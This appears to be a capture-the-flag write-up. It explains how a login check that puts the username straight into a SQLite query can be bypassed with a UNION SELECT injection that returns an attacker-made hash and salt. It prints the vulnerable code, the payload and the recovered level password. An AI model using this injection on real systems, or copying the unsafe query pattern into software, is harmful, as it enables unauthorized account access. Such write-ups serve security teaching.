Ok, so let’s look at some important parts. We know it's sqlite3 again and how it

1. Ok, so let’s look at some important parts. We know it's sqlite3 again and how it is setup:
2.  
3. # CREATE TABLE users (
4. # id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
5. # username VARCHAR(255),
6. # password_hash VARCHAR(255),
7. # salt VARCHAR(255)
8. # );
9.  
10.  
11. And
12.  
13. query = """SELECT id, password_hash, salt FROM users
14. WHERE username = '{0}' LIMIT 1""".format(username)
15. cursor.execute(query)
16.  
17. res = cursor.fetchone()
18. if not res:
19. return "There's no such user {0}!\n".format(username)
20. user_id, password_hash, salt = res
21.  
22. calculated_hash = hashlib.sha256(password + salt)
23. if calculated_hash.hexdigest() != password_hash:
24. return "That's not the password for {0}!\n".format(username)
25.  
26. So we can see that the statement is using our supplied username, which has an SQL injection of course. They're selecting the id, password_hash, and salt from users where the username equals our input. Let’s load up our own sample database, make some test queries and, see what happens....
27.  
28. sqlite> insert into users values ("myid", "myusername", "0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60", "SUPER_SECRET_SALT");
29.  
30. sqlite> select id, password_hash, salt FROM users where username = 'myusername';
31.  
32. myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
33.  
34. So, let’s do a union select after and supply exactly what we would like back.
35.  
36. sqlite> select id, password_hash, salt FROM users where username = 'myusername' union select 'new id', 'new hash', 'new salt';
37.  
38. myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
39. new id|new hash|new salt
40.  
41. As you can see, by using a union select we can define in the content of the response. The 'new id', 'new hash', and 'new salt' was in our response. After looking at the code when it does the compare, we can see that it does a sha256(password + salt) and compares it to what was in the response for the sql statement.
42.  
43. Let's supply our own hash and compare them to each other!
44.  
45. >>> import hashlib
46. >>> print hashlib.sha256("lolpassword" + "lolsalt").hexdigest()
47. dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5
48. >>>
49.  
50. We just created our new sha256 hash with the salt 'lolsalt'; let's now submit our new hash injection into the SQL statement.
51.  
52. username: z'%20union%20select%20'1','dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5','lolsalt
53.  
54. password:
55. lolpassword
56.  
57. The code will now take the password you submitted, hash it with the salt returned from the sql query, then compare it to the hash that was in the response (the salt and hashes that are in the response were the ones we supplied in our injection). This will lead to them matching and you receiving a message similar to this:
58.  
59. Welcome back! Your secret is: "The password to access level04 is: aZnRbEpSfX" (Log out)